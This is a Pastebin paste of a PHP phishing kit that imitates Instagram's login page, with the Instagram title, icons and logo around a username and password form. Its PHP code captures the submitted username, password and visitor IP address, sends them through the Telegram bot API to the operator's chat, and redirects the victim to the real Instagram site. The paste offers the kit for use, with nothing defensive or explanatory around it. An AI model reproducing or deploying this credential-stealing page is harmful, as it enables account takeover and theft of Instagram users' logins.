Advertisement
Guest User

Untitled

a guest
Jan 14th, 2020
1,965
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.99 KB | None | 0 0
  1. <html class=''>
  2. <head><link rel="mask-icon" href="//instagramstatic-a.akamaihd.net/h1/images/ico/favicon.svg/9d8680ab8a3c.svg" color="#262626"><link rel="shortcut icon" type="image/x-icon" href="//instagramstatic-a.akamaihd.net/h1/images/ico/favicon.ico/dfa85bb1fd63.ico"><link rel='stylesheet prefetch' href='https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css'><style class="cp-pen-styles">@import url(https://fonts.googleapis.com/css?family=Open+Sans);body{background-color:#FAFAFA;color:#DCDCDC;font-family:Open Sans}.login-box{margin-top:100px;text-align:center;width:430px;height:380px;background-color:#fff;padding:60px}.logo{height:70px;margin-bottom:30px}.form-control{margin-bottom:20px}.btn{width:100%;font-size:16px}</style> <title>Login - Instagram</title></head><body> <div class="well login-box center-block"> <img class="logo" src="http://www.dallasarboretum.org/assets/img/instagram-word.png"></img> <form name="login" method="post"> <input type="text" class="form-control" placeholder="Username" id="userid" name="userid" required/> <input type="password" class="form-control" id="pass" placeholder="Password" name="pswrd" required/> <button class="btn btn-primary" type="submit" id="submit">Log In</button> </div></form> </div>
  3.   <?php
  4. $api = "botTOKENDELBOT";
  5.  
  6. $input = file_get_contents("php://input");
  7. $update = json_decode($input, true);
  8. $message = $update['message']['text'];
  9. $chatid = $update['message']['chat']['id'];
  10. $messageid = $update['message']['from']['id'];
  11. function sendMessage($chatid, $text)
  12. {
  13.  global $api;
  14.  $url = "https://api.telegram.org/$api/sendMessage?chat_id=".$chatid."&text=".urlencode($text);
  15.  $get = file_get_contents($url);
  16. }
  17. if(isset($_POST['userid']) && isset($_POST['pswrd'])) {
  18.     $username = $_POST['userid'];
  19.     $password = $_POST['pswrd'];
  20.   header("Refresh:0; url= https://www.instagram.com/?hl=it" );}
  21. $ip = $_SERVER['REMOTE_ADDR'];
  22. if($username != ""){
  23. sendMessage(“tuo id", "nome utente: $username\nPassword: $password\n Ip: $ip");}
  24. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement